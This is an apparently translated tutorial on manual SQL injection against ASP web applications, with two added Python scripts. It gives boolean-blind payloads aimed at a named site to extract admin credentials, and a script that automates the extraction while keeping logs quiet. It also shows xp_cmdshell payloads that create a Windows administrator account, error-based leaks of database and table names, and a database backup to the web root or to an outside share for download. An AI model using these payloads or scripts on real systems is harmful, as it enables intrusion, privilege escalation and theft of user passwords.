A study of manual SQL injection against ASP scripts
  Add date: 07/08/2008   Publishing date: 07/08/2008   Hits: 186
 
ACCESS

Determine the database type (sysobjects is a SQL Server system table, so a normal page means SQL Server and an error page means Access):
http://www.zengke.com/product.asp?sort_id=24 and exists (select * from sysobjects)

Check whether an admin table exists: the page renders normally if it does, and shows an error if it does not.
http://www.zengke.com//product.asp?sort_id=24 and exists (select * from admin)

Check whether the admin table has an admin_name column:
/product.asp?sort_id=24 and exists (select admin_name from admin)

Test the length of the pwd value of the first admin row: the page renders normally when the condition is true (the length is at most 7) and errors when the value is longer. Adjust the number until the length is pinned down.
http://www.zengke.com//product.asp?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 order by [pwd]) T order by [pwd] desc) <=7

Brute-force the admin_name value in the admin table with the same true/false responses.
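The Access steps above (does the table exist, does the column exist, how long is the value, brute-force it) are one boolean-based blind procedure, and the following script automates it. This is an added example, not code from the article: an in-memory SQLite database stands in for the Access file behind product.asp, so SQLite's length(), substr() and unicode() play the role of Access's len(), mid() and asc(), and "order by ... limit 1" replaces "top 1 ... order by". The product row and the admin credentials are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the target: an in-memory SQLite database plays the
# role of the Access file behind product.asp. Table/column names follow the
# article; the rows (and the admin credentials) are made up for this example.
def build_target_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER, sort_id INTEGER, title TEXT)")
    db.execute("INSERT INTO product VALUES (1, 24, 'widget')")
    db.execute("CREATE TABLE admin (id INTEGER, admin_name TEXT, pwd TEXT)")
    db.execute("INSERT INTO admin VALUES (1, 'zengke', 'p4ss')")
    return db


class VulnerablePage:
    """Models product.asp: sort_id is concatenated straight into the SQL."""

    def __init__(self, db):
        self.db = db
        self.requests = 0

    def get(self, sort_id):
        """True = 'normal' page (a product was found), False = error/empty page."""
        self.requests += 1
        sql = "SELECT * FROM product WHERE sort_id=" + sort_id
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error:        # Access shows an error page here
            return False
        return len(rows) > 0


def ask(page, condition):
    """Inject one boolean condition after the real sort_id value."""
    return page.get("24 and (" + condition + ")")


def table_exists(page, table):
    return ask(page, "exists (select * from %s)" % table)


def column_exists(page, table, column):
    return ask(page, "exists (select %s from %s)" % (column, table))


def find_length(page, scalar, hi=64):
    """Smallest n with length(scalar) <= n, found by binary search (Access: len())."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(page, "length(%s) <= %d" % (scalar, mid)):
            hi = mid
        else:
            lo = mid + 1
    return lo


def find_char(page, scalar, pos):
    """Binary-search the printable-ASCII code of character pos (1-based).
    SQLite unicode(substr()) stands in for Access asc(mid()). Characters
    outside 32..126 would need a wider range."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(page, "unicode(substr(%s, %d, 1)) <= %d" % (scalar, pos, mid)):
            hi = mid
        else:
            lo = mid + 1
    return chr(lo)


def extract_value(page, table, column):
    """Pull the first row's value of table.column one character at a time.
    Returns None when the column does not exist (the error-page case)."""
    if not column_exists(page, table, column):
        return None
    scalar = "(select %s from %s order by %s limit 1)" % (column, table, column)
    n = find_length(page, scalar)
    return "".join(find_char(page, scalar, i) for i in range(1, n + 1))


if __name__ == "__main__":
    page = VulnerablePage(build_target_db())
    print("sysobjects exists:", table_exists(page, "sysobjects"))  # False: Access-style backend
    print("admin exists:", table_exists(page, "admin"))
    print("admin_name =", extract_value(page, "admin", "admin_name"))
    print("pwd        =", extract_value(page, "admin", "pwd"))
    print("requests used:", page.requests)
```

The binary searches matter in practice: each character costs about seven requests instead of up to ninety-five, which is the difference between a noisy log and a quiet one.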

SQL Server


① http://Site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

In SQL Server the semicolon separates two statements, and "--" marks the rest of the line as a comment. SQL Server therefore runs this as two statements: first the SELECT that fetches the record with ID=1, then the stored procedure xp_cmdshell, which executes operating-system commands. Here it runs "net user", creating a Windows account named "name" with the password "password". Then:

② http://Site/url.asp?id=1;exec master..xp_cmdshell "net localgroup administrators name /add"--

The new account "name" is added to the Administrators group, and in under two minutes you hold the highest privilege on the system. Of course, this only works when the application connects to the database as sa; otherwise it has no permission to call xp_cmdshell.

③ http://Site/url.asp?id=1 and db_name()>0

There was a similar example earlier, "and user>0", which reveals the name of the database user the application connects as; db_name() is another system function, and it returns the name of the database the application is connected to. Both leak the same way: the string cannot be converted to an integer for the ">0" comparison, and the conversion error message quotes it.

④ http://Site/url.asp?id=1;backup database <dbname> to disk='c:\inetpub\wwwroot\?.db';--

This is a ruthless move. With the database name obtained in ③, plus the absolute path that some IIS error messages expose, the database is backed up into the web directory and then downloaded in full over HTTP; every administrator and user password is laid bare. When the absolute path is unknown, you can also try backing up to a network share (for example \\202.96.xx.xx\Share\?.db), but the success rate is low.

⑤ http://Site/url.asp?id=1 and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0

As noted earlier, sysobjects is the SQL Server system table that stores all tables, views, constraints and other objects; "xtype='U' and status>0" selects user-created tables. The statement above takes the first such table and compares its name with 0; the name cannot be converted to an integer, so the error message exposes it. How to get the second and third tables is left for the clever reader to work out.
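The reader's exercise in ⑤ has a standard answer: exclude each recovered name with "and name not in ('...')" and repeat until the comparison no longer errors. The script below, an added example rather than code from the article, drives that loop against a constructed stand-in for the SQL Server behind url.asp. The stand-in reproduces only the behaviour the article relies on: comparing the subquery's nvarchar result with an int fails, and the error text quotes the value. The user-table names, the fake page and the error wording in it are assumptions for the example; the regex accepts both the SQL Server 2000 wording ("Syntax error converting the nvarchar value 'x' to a column of data type int.") and the 2005+ wording ("Conversion failed when converting the nvarchar value 'x' to data type int.").

```python
import re

# Constructed stand-in for sysobjects rows with xtype='U' and status>0
# (names made up for the example).
USER_TABLES = ["admin", "news", "product", "users"]

# Matches both wordings SQL Server has used for the int-conversion error;
# the capture group is the leaked value.
ERROR_RE = re.compile(
    r"converting the nvarchar value '([^']*)' to (?:a column of )?data type int")


class FakeSqlServerPage:
    """Simulates url.asp?id=... with the database error surfaced to the client.

    Real SQL Server evaluates the injected subquery and fails while converting
    its nvarchar result to int for the '>0' comparison. This mock models only
    that: it reads the 'name not in (...)' exclusion list from the payload,
    'returns' the first user table not excluded in an error page, and shows a
    normal page once none are left (the subquery is NULL, and NULL>0 is false).
    """

    def get(self, url):
        m = re.search(r"name not in \(([^)]*)\)", url, re.IGNORECASE)
        excluded = set(re.findall(r"'([^']*)'", m.group(1))) if m else set()
        remaining = [t for t in USER_TABLES if t not in excluded]
        if not remaining:
            return "<html><body>No record found.</body></html>"
        return ("Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
                "Conversion failed when converting the nvarchar value '%s' "
                "to data type int." % remaining[0])


def payload_for(known):
    """Build the step-5 payload, excluding the tables already recovered."""
    sub = "select top 1 name from sysobjects where xtype='U' and status>0"
    if known:
        sub += " and name not in (" + ",".join("'%s'" % n for n in known) + ")"
    return "1 and (" + sub + ")>0"


def leaked_value(response):
    """The value quoted in the conversion error, or None for a normal page."""
    m = ERROR_RE.search(response)
    return m.group(1) if m else None


def enumerate_tables(page, limit=100):
    """Walk the user tables one error message at a time."""
    known = []
    while len(known) < limit:
        url = "http://Site/url.asp?id=" + payload_for(known)
        name = leaked_value(page.get(url))
        if name is None or name in known:   # normal page: nothing left to leak
            break
        known.append(name)
    return known


if __name__ == "__main__":
    page = FakeSqlServerPage()
    print(payload_for(["admin"]))
    print(enumerate_tables(page))
```

The same loop recovers columns once a table name is known (compare "top 1 name from syscolumns where id=object_id('admin')" with 0 and exclude as you go), and the ③ payloads for user and db_name() are parsed by the same leaked_value() function.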

 